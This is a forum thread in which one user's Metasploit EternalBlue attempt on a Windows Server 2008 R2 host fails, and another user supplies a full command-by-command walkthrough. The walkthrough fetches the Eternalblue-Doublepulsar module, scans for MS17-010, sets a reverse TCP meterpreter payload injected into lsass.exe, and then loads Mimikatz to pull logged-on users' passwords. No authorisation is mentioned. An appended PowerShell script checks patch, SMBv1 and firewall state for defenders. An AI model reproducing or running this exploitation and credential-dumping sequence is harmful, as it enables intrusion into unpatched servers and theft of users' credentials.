
I have this problem with windows/smb/ms17_010_eternalblue


Ali_Sedaghat

I have this problem with windows/smb/ms17_010_eternalblue

Attacker OS: Kali Linux 2019.2 x32 ---> 192.168.15.101
metasploit v5.0.41-dev
Victim OS: Windows Server 2008 R2 Datacenter 7601 Service Pack 1 (x64) ---> 192.168.15.102
Port 445 is open & vulnerable

use exploit/windows/smb/ms17_010_eternalblue
set rhost 192.168.15.102
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.15.101
set lport 4444
exploit

[*] Started reverse TCP handler on 192.168.15.101:4444
[*] 192.168.15.102:445 - Connecting to target for exploitation.
[+] 192.168.15.102:445 - Connection established for exploitation.
[*] 192.168.15.102:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.15.102:445 - Sending all but last fragment of exploit packet
[*] 192.168.15.102:445 - Starting non-paged pool grooming
[+] 192.168.15.102:445 - Sending SMBv2 buffers
[+] 192.168.15.102:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.15.102:445 - Sending final SMBv2 buffers.
[*] 192.168.15.102:445 - Sending last fragment of exploit packet!
[*] 192.168.15.102:445 - Receiving response from exploit packet
[*] 192.168.15.102:445 - Sending egg to corrupted connection.
[-] 192.168.15.102:445 - Errno::ECONNRESET: Connection reset by peer
[*] Exploit completed, but no session was created.

Please help me.
Thanks.
 

Vertigo

I have this problem with windows/smb/ms17_010_eternalblue
Hello, Bro.
If the version is not patched, then:
> use exploit/windows/smb/eternalblue_doublepulsar
> info
> options
> set DOUBLEPULSARPATH /root/deps
> set PROCESSINJECT lsass.exe
> set TARGETARCHITECTURE x64
> options
> set PAYLOAD windows/x64/meterpreter/reverse_tcp
> set LHOST IP (your)
> set RHOST IP (target)
> show targets
> set target (number)
> exploit

But if the target is protected, then it won't help.
This is an outdated attack))
 

Sedaghat

Hello, Bro.
If the version is not patched, then:
> use exploit/windows/smb/eternalblue_doublepulsar
> info
> options
> set DOUBLEPULSARPATH /root/deps
> set PROCESSINJECT lsass.exe
> set TARGETARCHITECTURE x64
> options
> set PAYLOAD windows/x64/meterpreter/reverse_tcp
> set LHOST IP (your)
> set RHOST IP (target)
> show targets
> set target (number)
> exploit

But if the target is protected, then it won't help.
This is an outdated attack))
Thanks Bro.
I'll post two photos to make sure Target has a bug.
But I still can't use this bug.


 

Vertigo

Thanks Bro.
I'll post two photos to make sure Target has a bug.
But I still can't use this bug.
Good to see you again.
I looked at the photo.
There are some errors in the photo.

See step by step
Previously, the module was not in Metasploit, so it was installed separately.
1) Download the exploit:
Code:
# git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git
2) After the clone completes, we get the Ruby module eternalblue_doublepulsar and a deps directory:
Code:
# ls -alh /opt/Eternalblue-Doublepulsar-Metasploit/
Next, we created the directories and put the module in them.
This protects the module from being overwritten when Metasploit is updated.
This way:
Code:
# ls -alh /root/.msf4/modules/exploits/windows/smb/eternalblue_doublepulsar.rb
The deps directory can also be copied to the current user's home directory:
Code:
# ls /root/deps
3) You began to scan the target correctly for this vulnerability:
Code:
# msfconsole
> search ms17_010
> use auxiliary/scanner/smb/smb_ms17_010
> set RHOSTS IP (target or subnet)
> run
If the target is definitely vulnerable, we will see the value:
"Host is likely VULNERABLE to MS17-010!"
And a question mark at the beginning of the line, not a plus. [!]

4) Now, to attack Windows Server 2008 R2, we will use our installed module:
Code:
> use exploit/windows/smb/eternalblue_doublepulsar
> options
> set DOUBLEPULSARPATH /root/deps
> set ETERNALBLUEPATH /root/deps
> set PROCESSINJECT lsass.exe
> set TARGETARCHITECTURE x64
> options
> set PAYLOAD windows/x64/meterpreter/reverse_tcp
> set LHOST IP (your)
> set RHOST IP (target)
> show targets
> set target 8 (or 9)
> exploit
And we should get a session:
Code:
> sysinfo
> getuid
If everything went well, we can load Mimikatz into memory:
Code:
> load mimikatz
And extract the logins and passwords of logged-on users:
> wdigest
Hope this helps you, Bro
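Added note for readers on the defending side (not part of the thread): both replies above turn on whether the target is "protected", that is, whether MS17-010 is installed and whether SMBv1 is still reachable on port 445. The PowerShell below checks those conditions on a Windows Server 2008 R2 host like the one in the question. It is an added example, not code from the thread or from the Metasploit project. It assumes it is run as an administrator on the host itself, that the hotfix IDs are the ones the MS17-010 bulletin lists for Windows 7 / Server 2008 R2 (KB4012212 security-only, KB4012215 monthly rollup), and that the default firewall rule name "File and Printer Sharing (SMB-In)" has not been renamed.

```powershell
# Added example: host-side check of the MS17-010 exposure discussed in the thread.
# Written for PowerShell 2.0 as shipped with Server 2008 R2, so it avoids
# Get-SmbServerConfiguration (Server 2012+) and uses the registry switch instead.
# Assumption: KB list taken from the MS17-010 bulletin for Win7 / Server 2008 R2.

$ms17010Kbs = @('KB4012212', 'KB4012215')

# 1. Is one of the MS17-010 updates installed?
$installed = Get-HotFix -ErrorAction SilentlyContinue |
    Where-Object { $ms17010Kbs -contains $_.HotFixID }

if ($installed) {
    $ids = ($installed | ForEach-Object { $_.HotFixID }) -join ', '
    Write-Output "MS17-010 fix present: $ids"
} else {
    # Later monthly rollups are cumulative and may supersede these IDs,
    # so a miss here means "verify against update history", not "unpatched".
    Write-Output "MS17-010 fix NOT found among installed hotfixes; verify against update history"
}

# 2. Is the SMBv1 server disabled?  LanmanServer\Parameters\SMB1 = 0 disables it
#    (a missing value means the default, i.e. enabled, on this OS).
$key  = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'
$smb1 = (Get-ItemProperty -Path $key -Name SMB1 -ErrorAction SilentlyContinue).SMB1

if ($smb1 -eq 0) {
    Write-Output "SMBv1 server: disabled (SMB1 = 0)"
} else {
    Write-Output "SMBv1 server: ENABLED (SMB1 value missing or non-zero)"
    Write-Output "  To disable: Set-ItemProperty -Path '$key' -Name SMB1 -Type DWORD -Value 0 -Force ; then reboot"
}

# 3. Is port 445 exposed by the firewall?  Show the state of the default inbound
#    SMB rule set (assumed default rule name; adjust if the rules were renamed).
netsh advfirewall firewall show rule name="File and Printer Sharing (SMB-In)"
```

Read together, the three outputs tell a defender which of the thread's exploitation paths still apply: an installed fix closes the vulnerability itself, a disabled SMBv1 server removes the SMBv1 half of the groom described in the question's log, and a blocked inbound rule keeps the scanner from step 3 from reaching the port at all.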
 